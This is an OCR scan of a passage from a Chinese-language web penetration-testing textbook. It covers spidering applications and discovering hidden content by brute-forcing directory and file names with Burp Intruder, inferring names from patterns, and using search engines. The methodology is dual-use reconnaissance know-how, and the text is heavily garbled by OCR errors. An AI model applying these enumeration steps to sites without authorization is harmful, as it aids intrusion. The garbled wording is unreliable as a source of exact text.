配置 一 个 通过 验证 的 会 话 令 牌 或 提交 给 登录 功能 的 证 书 ， 前 面 提 到 的 
扑 虫 就 能 实现 有 效 抓 取 。 然 而 ， 即 使 获得 令 牌 或 证 书 ， 由 于 各 种 原 
因 ， 扑 虫 执 行 的 一 些 操 作 也 会 让 通过 验证 的 会 话 中 断 。 

e HSUPA URL, MRSS MYRRH he, Bl 
使 会 话 中 断 。 
如果 有 把 虫 向 某 个 敏感 功能 提交 无 效 输入 ， 应 用 程序 可 能 会 
进行 目 我 防御 ， 终 止 会 话 。 
e 如 果 应 用 程序 在 每 个 页 面 都 使 用 令 牌 ， 爬 虫 衣 定 无 法 按 正 
确 的 顺序 请 求 页 面 ， 这 可 能 引起 应 用 程序 结束 整个 会 


话 


AA 警告 ”在 一 些 应 用 程序 中 ， 即 使 运行 一 个 解析 并 请 求 


链接 的 人 简单 Web 息 虫 也 可 能 极其 危险 。 例 如 ， 应 用 程序 可 能 具有 删 
除 用 户 、 关 财 数据 库 、 重 局 服务 器 等 管理 功能 。 如 采 使 用 应 用 程序 
感知 的 候 虫 ， 该 仆 虫 发 现 并 使 用 敏感 功能 ， 束 可 能 造成 巨大 损失 。 


我 们 曾经 遇 到 一 个 应 用 程序 具有 某 种 内 容 管理 系统 (CMS) 功能 ， 
它 可 编辑 主 应 用 程序 的 实际 内 容 。 这 项 功能 可 通过 站 点 地 图 发 现 ， 
并 且 没 有 受到 任何 访问 控制 的 保护 。 如 有 果 针 对 这 个 站 点 运行 目 动 化 
疏 虫 ， 它 束 会 发 现 编辑 功能 并 开始 发 送 任意 数据 ， 致 使 主 Web 站 点 
的 内 容 在 爬虫 运行 时 吏 被 扭曲 。 


4.1.2 用户 指 定 的 抓 取 


这 是 一 种 更 加 复杂 且 可 控制 的 技巧 ， 它 比 目 动 化 抓 取 更 加 先进 。 
用 户 使 用 它 通 过 标准 浏览 右 以 常规 方式 浏览 应 用 程序 ， 试 图 枚 举 应 用 
程序 的 所 有 功能 。 之 后 ， 生 成 的 流量 罕 过 一 个 组 合 拦截 代理 服务 器 与 
候 虫 的 工具 ， 监 控 所 有 请 求 和 啊 应 。 该 工具 绘制 应 用 程序 地 图 、 集 中 
由 浏览 喜 访 问 的 所 有 URL， 并 且 像 一 个 正常 的 应 用 程序 感知 爬虫 那样 
分 析 应 用 程序 的 响应 ， 同 时 用 它 发 现 的 内 容 与 功能 更 新 站 点 地 图 。 
Burp Suite 和 WebScarab 中 的 爬虫 即 可 用 于 这 种 用 途 (请 参阅 第 20 章 了 
解 详细 信息 ) 。 


相 比 于 基本 的 抓 取 方法 ， 该 技巧 具有 诸多 优点 。 

口 如 果 应 用 程序 使 用 不 常用 或 复杂 的 导航 机 制 ， 用 户 能 够 以 常规 
方式 使 用 浏览 如 来 避 循 这 些 机 制 。 用 户 访问 的 任何 功能 和 内 容 将 由 代 
理 服 务 器 /爬虫 工具 处 理 。 
er 用 户 控制 提交 到 应 用 程序 的 所 有 数据 ， 这 样 可 确 你 满足 数据 确 
Th o 

口 用 户 能 够 以 常规 方 式 登 孙 应 用 程序 ， 确 保 通 过 验证 的 会 话 在 整 
个 解析 过 程 中 保持 活动 状态 。 如 果 所 执行 的 任何 操作 导致 会 话 终止 ， 
用 户 可 重新 登录 并 继续 浏览 。 

口 由 于 该 技巧 可 从 应 用 程序 的 啊 应 中 解析 出 链接 ， 因 而 它 能 够 完 
整 枚 举 任 何 危险 功能 (如 deleteUserjsp) ， 并 能 将 其 合并 到 站 点 地 图 
中 。 但 是 用 户 可 以 根据 目 己 的 判断 决定 请 求 或 执行 哪些 功能 。 

在 Extreme Internet Shopping 站 点 中 ， 以 前 爬虫 无 法 为 /home 中 的 任 
何 内 容 建立 索引 ， 因 为 这 些 内 容 已 通过 验证 。 和 针对 /home 的 请 求 将 导致 
DF ale By: 

HTTP/1.1 302 Moved Temporarily 
Date: Mon, 24 Jan 2011 16:13:12 GMT 


Server: Apache 


Location: /auth/Login?ReturnURL=/home/ 


通过 用 户 指导 的 抓 取 ， 用 户 可 以 直接 使 用 浏览 器 登录 应 用 程序 ， 
随后 代理 服务 器 / 候 曰 工具 将 提取 生成 的 会 话 ， 并 确定 现在 对 用 户 可 用 
的 所 有 其 他 内 容 。 用 户 成 功 通过 应 用 程序 受 保护 区 域 的 验证 时 的 EIS 站 
点 地 图 如 图 4-2 所 示 。 
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图 4-2 ”执行 用 户 指导 的 抓 取 后 Burp 显 示 的 站 点 地 


这 这 揭示 了 主 集 单 系 统 中 的 其 他 些 资 源 。 该 图 显示 了 一 个 对 私有 
用 户 资 料 的 引用 ， 此 用 户 资料 通过 onClick 事 件 处 理 程序 局 动 的 
JavaScript K Ati fA] : 


<a href="#" onclick="ui_nav('profile')">private profile</a> 


FA fe eA WebJIG# (MSN AMHTML FAIRER, AE AT HES ith 
这 种 类 型 的 链接 。 即 使 是 最 先进 的 目 动 化 应 用 程序 爬虫 ， 仍 然 无 法 抓 
取 当 前 应 用 程序 和 浏览 絮 扩 展 所 采用 的 各 种 导航 机 制 。 但 是 ， 通 过 用 
A 导 的 抓 取 ， 用 户 只 需 使 用 浏览 器 访问 屏幕 上 可 见 的 链接 ， 代理 服 

右 / 爬 虫 工具 驶 会 将 生成 的 内 容 添 加 到 站 点 地 图 中 。 

相反 ， 值 得 注意 的 是 ， 疏 虫 已 成 功 确 定 HIML 注 释 中 包含 的 指 
回 /core/sitestats 的 链接 ， 即 使 该 链接 并 未 在 屏幕 上 癌 用 户 显示 。 


YY fen 除 上 面 描述 的 代理 服务 器 /爬虫 工具 外 ， 在 应 用 程序 
解析 过 程 中 ， 我 们 还 经 常 使 用 一 些 其 他 工具 ， 如 可 从 浏览 絮 界 面 执 
行 HTTP 和 HTML 分 析 的 各 种 浏 宽 器 扩展 工具 。 例 如 ， 图 4-3 所 示 的 
IEWatch 工 具 可 在 Microsoft Internet Explorer 中 运行 ， 对 所 有 请 求 和 
响应 〈 包 括 消息 头 、 请 求 参数 与 cookie) 进行 监控 ， 并 分 析 每 一 个 
应 用 程序 页 面 ， 以 显示 链接 、 脚 本 、 表 单 和 厚 客 户 端 组 件 。 虽 然 可 
以 在 拦截 代理 服务 器 中 查看 所 有 这 些 信 息 ， 但 是 ， 拥 有 另 一 份 解析 
数据 有 助 于 更 好 地 了 解 应 用 程序 ， 并 枚 举 它 的 所 有 功能 。 请 参阅 第 
20 草 了解 有 关 这 种 工具 的 详细 信息 。 
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图 4-3” 正 Watch 在 浏览 器 中 进行 HITP 和 HTML 分析 


渗透 测试 步骤 


(1) 配置 浏览 器 ， 使 用 Burp 或 WebScarab 作 为 本 地 代理 服务 器 
(如 果 不 确定 ， 请 参阅 第 20 革 了 解 相关 信息 ) 。 

(2) 以 常规 方式 浏览 整个 应 用 程序 ， 访 问 发 现 的 每 一 个 链 
接 /URL ， 提 区 每 一 个 表单 并 执行 全 部 多 阶段 功能 。 党 试 在 
JavaScript 激 活 与 禁用 、cookie 激 活 与 禁用 的 情况 下 进行 浏览 。 许 多 
应 用 程序 能 够 处 理 各 种 浏览 絮 配 置 ， 可 以 获取 应 用 程序 内 的 不 同 内 
容 和 代码 路 径 。 

(3) 检查 由 代理 服务 器 / 候 虫 工具 生成 的 站 点 地 图 ， 确 定 手 动 
浏 吕 时 没有 发 现 的 所 有 应 用 程序 内 容 或 功能 。 确 定 仆 虫 如何 枚 举 每 
一 项 内 容 ， 例 如 ， 在 Burp Spider 中 ， 检 查 “ 链 接 自 ” (Linked From) 
的 详细 内 容 。 通 过 浏览 喜 访 问 这 些 内 容 ， 以 使 代理 服务 器 /爬虫 工具 
检查 服务 器 响应 ， 从 而 确定 其 他 所 有 内 容 。 继 续 递 归 执 行 上 壕 步 
又 ， 直 到 无 法 再 确定 其 他 内 容 或 功能 。 

(4) 另外， 还 可 以 要 求 工 具 以 已 经 枚 举 的 所 有 内 容 为 基础 ， 
主动 抓 取 站 点 内 容 。 首 和 完 ， 请 确定 任何 危险 的 或 可 能 会 中 断 应 用 程 
凶 会 话 的 URL， 并 配置 怜 虫 ， 将 它们 排除 在 抓 取 范围 之 外 。 运 行 疏 
虫 并 检查 它 发 现 的 结果 以 查找 其 他 所 有 内 容 。 

在 代理 服务 器 / 息 虫 工具 生成 的 站 点 地 图 中 包含 大 量 关 于 目标 应 
E E tert res 


4.1.3 “发现 隐藏 的 内 容 


应 用 程序 常常 包含 没有 直接 链接 或 无 法 通过 可 见 的 主要 内 容 访问 
ee 
列 。 

男 一 个 例子 是 ， 应 用 程序 为 不 同类 型 的 用 户 (如 匿名 用 户 、 通 过 
验证 的 常规 用 户 和 管理 员 ) 提供 不 同 的 功能 。 在 某 种 权限 下 对 应 用 程 
序 进 行 彻 展 抓 取 的 用 户 会 遗漏 拥有 另 一 种 权限 的 用 户 可 使 用 的 功能 。 
发 现 相 关 功 能 的 攻击 者 可 利用 这 些 功能 提升 其 在 应 用 程序 中 的 权限 。 


人 
ZK œ 

口 备份 文件 。 如 果 使 用 动态 页 面 ， 它 们 的 文件 扩展 名 可 能 已 变 成 
nn 
用 的 漏洞 。 
口 包含 Web 根 目录 下 (或 根 目录 外 ) 完整 文件 快照 的 备份 档案 ， 
可 以 使 用 它 迅 速 确 定 应 用 程序 的 所 有 内 容 与 功能 。 
E 
妆 的 新 功能 。 
口 定 制 应 用 程序 中 的 默认 应 用 程序 功能 对 用 户 不 可 见 ， 但 在 服务 
器 端 仍然 可 见 。 
口 尚未 从 服务 器 中 删除 的 旧版 本 文件 。 如 果 使 用 动态 页 面 ， 这 些 
和 
漏洞。 

口 配 置 和 包含 敏感 数据 (如 数据 库 证 书 ) 的 文件 。 

口 编 译 现 有 应 用 程序 功能 的 源 文件 。 

口 极端 情况 下 ， 源 代码 中 可 能 包含 用 户 名 和 密码 等 信息 ， 但 更 可 
能 提供 有 关 应 用 程序 状态 的 信息 。 如 果 某 个 位 置 出 现 “ 测 试 此 功 
能 ” (test this function) 或 类 似 的 关键 短语 ， 应 立即 从 此 处 开始 探查 漏 
洞 。 

口 包含 有 效用 户 名 、 会 话 令 牌 、 被 访问 的 URL 以 及 所 执行 操作 等 
敏感 信息 的 日 志文 件 。 

发 现 隐藏 的 内 容 需 要 组 合 使 用 自动 和 手动 技巧 ， 而 且 往往 需要 一 
定 的 运气 。 

1. BAR 

第 14 章 将 介绍 攻击 者 如 何 利用 自动 技巧 提高 攻击 应 用 程序 的 效 
率 。 现 在 可 以 利用 自动 技巧 向 web 服务 器 提出 大 量 请 求 ， 党 试 猜测 隐 
沽 功能 的 名 称 或 标识 符 。 

例如 ， 假 设 用 户 指定 的 抓 取 已 经 确定 有 以 下 应 用 程序 内 容 : 


http://eis/auth/Login 


http: //eis/auth/ForgotPassword 
http: //eis/home/ 

http: //eis/pub/media/100/view 
http://eis/images/eis.gif 


http://eis/include/eis.css 


御 完 ， 试 图 确定 隐藏 内 容 的 目 动 化 工具 将 提出 下 列 请 求 ， 以 定位 


其 他 目录 : 


http: 


http 


//eis/About/ 


://eis/abstract/ 
http: 
http: 
http: 
http: 


//eis/academics/ 
//eis/accessibility/ 
//eis/accounts/ 
//eis/action/ 


Burp Intruder 可 用 于 循环 访问 一 组 常见 的 目 孙 名 称 并 收集 服务 器 的 
啊 应 信息 ， 可 通过 检查 这 些 信息 来 确定 有 效 的 目录 。 图 4-4 表 示 正 在 配 
置 Burp Intruder 探 查 Web 根 目录 中 的 常见 目录 。 


~ burp suite professional =] =~ Sei) 
burp intuder repeater window help 
| target | proxy spider scanner | muder | repeater sequencer decoder | comparer | options alerts 
1 /a 
targat | positions payloads | optons 
attack type sniper Y 
1 pavioad postion Iangln' 321 
GET /§8/ HIIP/l..l = | add5 
Bost: cis 
Veer-—Agent: Bozilia/S.3 (Vincovs; U; Vindews FT €.1:; en-GB; zvy:1.9.2. 1J) 
Gecko/2UiU2203 Faretox/3.6.33 dearg — 
Accept: textsbtel,application/xhtmltasl, application/xml;q-0.S5, */*:q-3.8 
hecepe-Lanquaye: en-gb, en; qe0.5 auto § 
Accept -faced.ng: gzip,deflate — 
Accept-Charset: 150-0059-1,urf-0; qe0.7,*:c¢e0." 
; Sm : ps refresh 
mm Gear 
= | O maiches 


执行 攻击 后 ， 单 击 status 和 length 等 标题 栏 会 对 其 中 的 结 


图 4-4 


配置 Burp Intruder 探 查 常 见 目 


应 分 类 ， 有 助 于 迅速 发 现 异常 ， 如 图 4-5 所 示 。 


录 


进行 相 


attack save columns 


Filter: showing all items 


ee 
| request | paylcad | status | error | 
a i a 


images 

gb 

home 
server-status 


User-Agent: Mozilla/5.0 (Windows: U; Vindows NT &.1; en-GB; 
evi:l.9.2.13) Gecko/20101203 Firefox/3.6.13 
Accept: 
text/html, application/xhtml+xml, application/xml;q=0.9,%*/*:q=0 
-8 
| Accept-Language: en-gbh,en;q=0.5 


| hed 


图 4-5”Burp Intruder 显 示 目 录 变 力 攻击 结果 


对 目录 和 子 目 录 进 行 蛮 力 攻击 后 ， 束 可 以 查找 应 用 程序 中 的 其 他 
页 面 。 这 时 ，/auth 目 录 特 别 有 用 ， 其 中 包含 在 抓 取 过 程 中 确定 的 登录 
资源 ， 对 未 通过 验证 的 攻击 者 而 言 ， 这 可 能 是 一 个 不 错 的 起 点 。 同 
样 ， 攻 击 者 可 以 请 求 该 目 永 中 的 一 系列 文件 : 


http://eis/auth/About/ 
http://eis/auth/Aboutus/ 

http: //eis/auth/AddUser/ 
http://eis/auth/Admin/ 
http://eis/auth/Administration/ 
http: //eis/auth/Admins/ 


此 攻击 的 结果 如 图 4-6 所 示 ， 它 确定 了 /auth 目 录 中 的 一 些 资 源 : 


| User-Agent: Nozilla/4. O (compatible: MSIE 7.0; Windows NT €.0) 
Connection: close 
Content-Length: € 


图 4-6 Burp Intruder 显 示 文 件 亦 力 攻击 结果 


Login 
Logout 
Register 
Profile 


值得 注意 的 是 ， 针 对 Profile 的 请 求 返回 了 HTTP 状 态 码 302。 这 表 
示 如 有 果 未 经 验证 访问 此 和 链接， 用户 将 被 重 定 癌 到 登录 页 面 。 此 外 ， 虽 
然 Login 页 面 已 在 抓 取 过 程 中 被 发 现 ， 但 Register 页 面 尚未 被 发 现 。 这 
A 攻击 者 能 够 在 该 站 点 上 注册 一 个 用 户 账 


T 注解 不 要 想当然 地 认为 ， 如果 被 请 求 的 资源 存在 ， 应 用 


程序 将 返回 200 OK 响应 ， 否 则 将 返回 404 Not Found 啊 应 。 许 多 应 用 
程序 以 自 定 义 的 方式 处 理 访问 不 存在 资源 的 请 求 ， 通 常 运 回 一 个 带 
200 啊 应 码 的 预定 义 错 误 消 轧 。 而 且 ， 一 些 访问 现存 资源 的 请 求 可 
能 会 收 到 非 200 啊 应 。 下 面 简 要 说 明 在 使 用 亦 力 技巧 查找 隐藏 内 容 
时 可 能 遇 到 的 响应 码 的 含义 。 

口 302 Found。 如果 重 定 癌 指 癌 一 个 登录 页 面 ， 那 么 只 有 通过 验 
证 的 用 户 才 能 够 访问 该 资源 ， 如 果 指 同一 个 错误 消 居 ， 整 可 能 披露 
其 他 不 同 的 原因 ; 如果 指 同 男 一 个 位 置 ， 重 定 辣 可 能 属于 应 用 程序 
特定 逻辑 的 一 部 分 ， 应 深入 分 析 。 

口 400 Bad Request。 应 用 程序 可 能 对 URL 中 的 目录 和 文件 名 使 
用 定制 的 命名 方案 ， 但 特殊 的 请 求 并 不 遵循 该 方案 。 然 而 ， 出 现 这 
种 情况 很 可 能 是 因为 使 用 的 词汇 中 包含 一 些 空白 符 或 其 他 无 效 的 语 
法 。 

口 401 Unauthorized 或 403 Forbidden。 该 啊 应 通常 表示 被 请 求 的 
资源 存在 ， 但 不 管用 户 的 验证 状态 或 权限 等 级 如 何 ， 禁 止 任何 用 户 
访问 该 资产。 请 求 目 孙 时 往往 会 返回 此 啊 应 ， 可 以 据 此 推 朵 所 请 求 
的 目录 确实 存在 。 

口 500 Internal Server Error ° 在 查找 内 容 的 过 程 中 ， 该 啊 应 通常 
表示 应 用 程序 希望 在 请 求 资 源 时 提交 某 些 参数 。 


由 于 各 种 可 能 的 啊 应 都 可 表示 存在 某 些 重要 内 容 ， 因 而 很 难 编写 
出 一 段 完 全 目 动 化 的 脚本 来 输出 一 组 有 效 资源 。 最 佳 方法 是 在 使 用 伙 
力 技巧 时 尽 可 能 多 地 收集 与 应 用 程序 有 关 的 信息 ， 并 对 其 进行 手动 检 


c= 


渗透 测试 步骤 


(1) 手动 提出 一 些 访问 有 效 与 无 效 资源 的 请 求 ， 并 确定 服务 
器 如 何 处 理 无 效 资 源 。 
人 目 动 查 找 隐藏 

容 > FM 

(3) 上 自动 提出 访问 应 用 程序 内 已 知 存在 的 每 个 目录 或 路 径 中 
常用 文件 名 和 目录 的 请 求 。 使 用 Burp Intruder 或 一 段 定制 脚本 ， 结 
合 常 用 文件 名 和 目录 词汇 表 ， 迅 速生 成 大 量 请 求 。 如 果 已 经 确定 应 
用 程序 处 理 访问 无 效 资源 请 求 的 特定 方式 (如 自 定义 的 fle not 
found 页 面 ) ， 应 配置 Intruder 或 脚本 突出 显示 这 些 结 果 ， 以 便 将 其 
忽略 。 

(4) 收集 从 服务 器 收 到 的 啊 应 ， 并 手动 检查 这 些 啊 应 以 确定 
有 效 的 资源 。 

(5) 反复 执行 这 个 过 程 ， 直 到 发 现 新 内 容 。 


2. 通过 公布 的 内 容 进行 推测 

许多 应 用 程序 对 其 内 容 与 功能 使 用 某 种 命名 方案 。 通 过 应 用 程序 
中 已 经 存在 的 资源 进行 推断 ， 可 以 调整 目 动 枚 举 操作 ， 提 高 发 现 其 他 
隐藏 内 容 的 可 能 性 。 

请 注意 ， 在 EIS 应 用 程序 中 ，/auth 中 的 所 有 资源 均 以 大 写字 母 开 
头 ， 这 就 症 上 一 市 的 文件 蛋 力 攻击 中 使 用 的 单词 表 有 意 大 写 的 原因 。 
而 且 ， 既 然 我 们 已 在 /auth 目 录 中 确定 了 一 个 名 为 ForgotPassword 的 页 
面 ， 我 们 就 可 以 在 其 中 搜索 其 他 名 称 类 似 的 项 目 ， 例 如 : 

http://eis/auth/ResetPassword 

此 外 ， 在 用 户 指导 的 抓 取 过 程 中 创建 的 站 点 地 图 确定 了 以 下 资 


http://eis/pub/media/100 
http://eis/pub/media/117 
http://eis/pub/user/11 

其 他 类 似 范 围 的 数值 可 用 于 确定 其 他 资源 和 信息 。 


V 提示 “Burp Intruder 高 度 可 定制 化 ， 并 且 可 用 于 针对 HTTP 
请 求 的 任何 部 分 。 图 4-7 显 示 了 如 何 使 用 Burp Intruder 对 前 半 部 分 文 
件 名 实施 亦 力 攻击 ， 以 提出 下 列 请 求 ; 


http: //eis/auth/AddPassword 
http: //eis/auth/ProrgotPassword 
http://eis/auth/CGetPassword 
http: //eis/auth/Reset Password 
http: //eis/auth/RetrievePassword 
http: //eis/auth/UpdatePassword 


> burp suite professional hop 


cup bude repeii window help 


target | peo | spider | scanner | mbuge | repasiar sequencer | decoder ~ comparer | optiona | alens 
Em- 
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|Accept-Language: en 

User-Agent: Horilia/4.0 tcompatibie;: MSIE 7.0: Wanmdows NT €.0) 

Connection: close 


图 4-7 使 用 Burp Intruder Hib ay AFE Kj E Hel BS a 


ET 


渗透 测试 步骤 


(1) 检查 用 户 指定 的 浏览 与 基本 蛮 力 测试 获得 的 结果 。 编 译 


枚 举 出 的 所 有 子 目 录 名 称 、 文 件 词 干 和 文件 扩展 名 列表 。 

(2) 检查 这 些 列表 ， 确 定 应 用 程序 使 用 的 所 有 命名 方案 。 例 
如 ， 如 果 有 些 页 面 的 名 称 为 AddDocument.jsp 和 ViewDocument.jsp， 
那么 可 能 还 有 叫做 EditDocument.jsp 和 RemoveDocument.jsp 的 页 面 。 
通常 ， 只 需要 查看 儿 个 示例 ， 束 能 推测 出 开发 者 的 命名 习惯 。 根 据 
其 个 人 风格 ， 开 发 者 可 能 采用 各 种 命名 方法 ， 如 宛 长 式 

(AddANewUser.asp) 、 人 简洁 式 (AddUser.asp) 、 使 用 缩写 式 
(AddUsr.asp) 或 更 加 模糊 的 命名 方式 (AddU.asp) 。 了 解 开发 者 
使 用 的 命名 方式 有 助 于 猜测 出 尚未 确定 的 内 容 的 准确 名 称 。 

(3) 有 时 候 ， 不 同 内 容 的 命名 方案 使 用 数字 和 日 期 作为 标识 
符 ， 通 过 它们 可 轻易 推测 出 隐藏 的 内 容 。 静 态 内 容 (而 非 动态 脚 
本 ) 常常 采用 这 种 命名 方式 。 例 如 ， 如 果 一 家 公司 的 Web 站 点 含有 
AnnualReport2009.pdf 和 AnnualReport2010.pdf 这 两 个 文件 的 链接 ， 
应 该 可 以 立即 确定 接 下 来 的 报告 名 称 。 令 人 难以 置信 的 是 ， 一 些 公 
司 在 公布 金融 结果 之 前 ， 常 常会 将 包含 金融 信息 的 文件 放 在 Web 服 
务 右 上 ， 有 些 精明 的 新 闻 记 者 往往 能 够 根据 其 在 前 些 年 使 用 的 命名 
方案 ， 发 现 这 些 文 件 。 

(4) 检查 所 有 客户 端 代码 ， 如 HTTP 和 JavaScript， 确 定 任何 与 
隐藏 服务 器 端 内 容 有 关 的 线索 。 这 些 代 码 包 括 与 受 保 护 或 没有 建立 
链接 功能 有 关 的 HTML 注 释 以 及 包含 禁用 SUBMIT 元 素 的 HTML 表 
单 等 。 通 常 ， 注 释 由 生成 Web 内 容 的 软件 自动 生成 ， 或 者 由 应 用 程 
序 运 行 的 平台 生成 。 参 考 服务 器 端 包 售 文 件 之 类 的 内 容 也 特别 有 
用 。 这 些 文件 可 被 公众 下 载 ， 并 且 可 能 包含 高 度 敏感 的 信息 (如 数 
据 库 连 接 字 符 串 和 密码 ) 。 另 外 ， 开 发 者 的 注释 中 可 能 包含 各 种 有 
用 的 信息 ， 如 数据 库 名 称 、 后 端 组 件 引 用 、SQL 碍 询 字 符 串 等 。 厚 
客户 端 组 件 (如 Java applet 和 ActiveX 控 件 ) 也 可 能 包含 可 供 利 用 的 
敏感 数据 。 请 参阅 第 15 章 了 解 应 用 程序 揭示 上 自身 信息 的 其 他 方式 。 

(5) 把 已 经 枚 举 出 的 内 容 添 加 到 其 他 根据 这 些 列表 项 推测 出 
来 的 名 称 中 ， 并 将 文件 扩展 名 列表 添加 a 到 txt、bak、src、inc 和 old 这 


些 和 常用 扩展 名 中 ， 它 们 也 许 能 够 披露 现 有 页 面 备 份 版 本 的 来 源 以 及 
与 所 使 用 的 开发 语言 有 关 的 扩展 名 ， 如 .Java 和 .cs; 这 些 扩展 名 可 能 
揭示 已 经 被 编译 到 现 有 页 面 的 来 源 文 件 〈 请 参阅 本 章 后 面 的 提示 ， 
了 解 如 何 确定 所 使 用 的 技术 ) 。 

(6) 搜索 开发 者 工具 和 文件 编辑 器 不 经 意 建立 的 临时 文件 。 
例如 .DS_Store 文 件 ， 其 中 包含 一 个 OS XARA, RE 
file.php~1， 它 是 编辑 fle.php 时 临时 创建 的 文件 ， 或 者 大 量 软 件 工 具 
使 用 的 .tmp 文 件 。 

(7) 进一步 执行 自动 操作 ， 结 合 目录 、 文 件 词 干 和 文件 扩展 
名 列表 请 求 大 量 潜在 的 资源 。 例 如 ， 在 特定 的 目录 中 ， 请 求 每 个 文 
ue 干 和 每 个 文件 扩展 名 ; 或 者 请 求 每 个 目录 名 作为 已 知 目录 的 子 
HX © 

(8) 如 果 确 定 应 用 程序 使 用 一 种 统一 的 命名 方案 ， 考 虑 在 此 
基础 上 执行 更 有 和 针对 性 的 蛋 力 测试 。 例 如 ， 如 果 已 知 
AddDocument.jsp 和 ViewDocument.jsp 存 在 ， 就 可 以 建立 一 个 操作 列 
K (编辑 、 删 除 、 新 建 等 ) 并 请 求 XxxDocument.jsp。 此 外 ， 还 可 以 
建立 项 目 类 型 (用户 、 账 户 、 文 件 等 ) 并 请 求 AddXxx.jsp。 

(9) 以 新 枚 举 的 内 容 和 模式 作为 深入 用 户 指 定 抓 取 操作 的 基 
础 ， 反 复 执 行 上 述 每 一 个 步骤 ， 继 续 执行 自动 内 容 碍 找 。 所 采取 的 
操作 只 受到 想象 力 、 可 用 时 间 以 及 在 所 针对 的 应 用 程序 中 发 现 隐藏 
内 容 的 重要 性 的 限制 。 


E f 注解 ”使 用 Burp Intruder Pro 的 “内 容 查 找 ” (Content 
Discovery) 功能 可 以 自动 完成 我 们 迄今 为 止 介 绍 的 大 多 数 任务 。 在 


使 用 浏 跑 辟 手 动 解析 应 用 程序 的 可 见 内 容 后 ， 可 以 选择 Burp 站 点 地 
图 的 一 个 或 多 个 分 支 ， 并 对 这 些 分 支 启动 内 容 查 找 会 话 。 在 尝试 查 
找 新 内 容 时 ，Burp 使 用 以 下 技巧 : 

口 使 用 内 置 的 常用 文件 名 和 目录 名 列表 实施 亦 力 攻击 ; 

口 基于 在 目标 应 用 程序 中 观察 到 的 资源 名 称 动 态 生 成 单词 表 ; 
口 推断 包含 数字 和 日 期 的 资源 名 称 ; 

口 基 于 已 确定 的 资源 测试 其 他 文件 扩展 名 ; 

口 从 查找 到 的 内 容 中 进行 抓 取 ; 

口 目 动 识别 有 效 或 无 效 啊 应 ， 以 减少 错误 警报 。 


所 有 操作 均 以 递归 方式 执行 ， 在 发 现 狐 的 应 用 程序 内 容 后 ， 将 
安排 新 的 查找 任务 。 图 4-8 显 示 了 一 个 正在 进行 的 针对 EIS 应 用 程序 
的 内 容 碍 找 会 话 。 
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程序 的 内 容 查找 会 话 


图 4-8 一 个 正在 进行 的 针对 EIS 应 


> 


YV 提示 “在 执行 自动 内 容 查找 任务 时 ，OWASP 发 起 的 
DirBuster 项 目 也 是 一 个 有 用 的 资源 ， 其 中 包 舍 大 量 以 出 现 频率 排序 
的 、 在 现实 世界 的 应 用 程序 中 发 现 的 目 孙 名 列表 。 


3. 利用 公共 信息 

应 用 程序 的 一 些 内 容 与 功能 现在 可 能 并 没有 与 主要 内 容 建立 链 
接 ， 但 过 去 曾经 存在 链接 。 在 这 种 情况 下 ， 各 种 历史 记录 中 可 能 仍然 
Ce eee 。 我 们 可 以 利用 两 类 主要 的 公共 资源 查找 隐藏 的 

谷 o 

口 搜索 引擎 ， 如 Google。 这 些 搜索 引擎 中 你 存 有 其 使 用 的 强大 的 
虫 所 发 现 的 所 有 内 容 的 详细 目 永 ， 并 且 将 这 些 内 容 保存 在 缓存 中 ， 即 
使 原始 内 容 已 被 删除 ， 缓 存 中 的 内 容 仍然 不 变 。 


口 Web 档 案 ， 如 www.archive.org 上 的 WayBack Machine。 这 些 档 案 
保存 大 量 Web 站 点 的 历史 记录 。 许 多 时 候 允 许 用 户 浏览 某 个 站 点 从 几 
年 前 到 现在 于 不 同时 期 彻底 复制 的 站 点 快照 。 

除 过 去 已 经 链接 的 内 容 外 ， 这 些 资源 中 还 可 能 包含 第 三 方 站 点 ， 
而 非 目 标 应 用 程序 本 身 链接 内 容 的 引用 。 例 如 ， 一 些 应 用 程序 中 包含 
仅 可 由 其 商业 合作 伙伴 使 用 的 限制 性 功能 。 这 些 合作 伙伴 可 能 会 以 应 
用 程序 无 法 预料 的 方式 披露 上 述 功 能 。 


渗透 测试 步骤 


(1) 使 用 几 种 不 同 的 搜索 引擎 和 Web 档 案 碍 找 它 们 编 入 索引 或 
保存 的 关于 所 攻击 的 应 用 程序 的 内 容 。 
(2) 查询 搜索 引擎 时 ， 可 以 使 用 各 种 高 级 技巧 提高 搜索 效 
率 。 以 下 建议 适用 于 Google (可 以 在 其 他 引擎 中 选择 “高 级 搜索 ” 找 
到 对 应 的 查询 ) 。 
g site:www.wahh-target.com。 它 将 返回 Google 引 用 的 
每 一 个 目标 站 点 资源 。 
g site:www.wahh-target.com login。 它 将 返回 所 有 包含 
login 表 达 式 的 页 面 。 在 大 型 而 复杂 的 应 用 程序 中 ， 这 个 技 
巧 可 用 于 迅速 定位 感 兴趣 的 资源 ， 如 站 点 地 图 、 密 码 重 设 
功能 、 管 理 菜 单 等 。 
Dlink:www.wahh-target.com。 它 将 返回 其 他 Web 站 点 
和 应 用 程序 中 所 有 包含 目标 站 点 链接 的 页 面 。 其 中 包括 过 
去 内 容 的 链接 或 仅 第 三 方 可 用 的 功能 ， 如 合作 伙伴 链接 。 
口 related:www.wahh-target.com。 它 将 返回 与 目标 站 
点 “相似 ”的 页 面 ， 因 此 可 能 包含 大 量 无 天 的 资料 。 但 是 ， 
其 中 也 可 能 包含 在 其 他 站 点 与 日 标 有 关 的 讨论 ， 它 们 可 能 
会 有 帮助 。 
(3) 每 次 搜索 时 ， 不 仅 在 Google 的 默认 Web 部 分 进行 搜索 ， 还 
要 搜索 “ 群 组 "和 “新 闻 ” 部 分 ， 它 们 可 能 会 提供 不 同 的 结果 。 
(4) 浏览 到 某 个 查询 搜索 结果 的 最 后 一 个 页 面 ， 并 选择 “将 省 
略 的 结果 纳入 搜索 范 围 后 再 重新 搜索 ”。 默 认 情 况 下 ，Google 会 删除 
结果 中 它 认为 与 其 他 页 面 非常 相似 的 页 面 ， 过 滤 见 长 的 结果 。 撤 销 
ee 不 同 的 页 面 ， 它 们 也 许 有 助 于 攻击 目标 应 用 
EPP ° 
(5) 查看 感 兴趣 页 面 的 缓存 版 本 ， 包 括 任何 不 再 在 应 用 程序 
中 出 现 的 内 容 。 某 些 情况 下 ， 搜 索引 擎 缓存 中 可 能 包含 如 果 未 通过 
号 份 验证 或 付费 就 无 法 直接 访问 的 货源 。 
(6) 在 属于 相同 组 织 的 其 他 域名 上 执行 相同 的 查询 ， 这 些 域 
名 中 可 能 包含 与 所 攻击 的 应 用 程序 有 关 的 有 用 信息 。 


如 末 搜 索 结 末 发 现 主 应 用 程序 中 不 再 存 有 和 链接 的 陈旧 内 容 和 功 


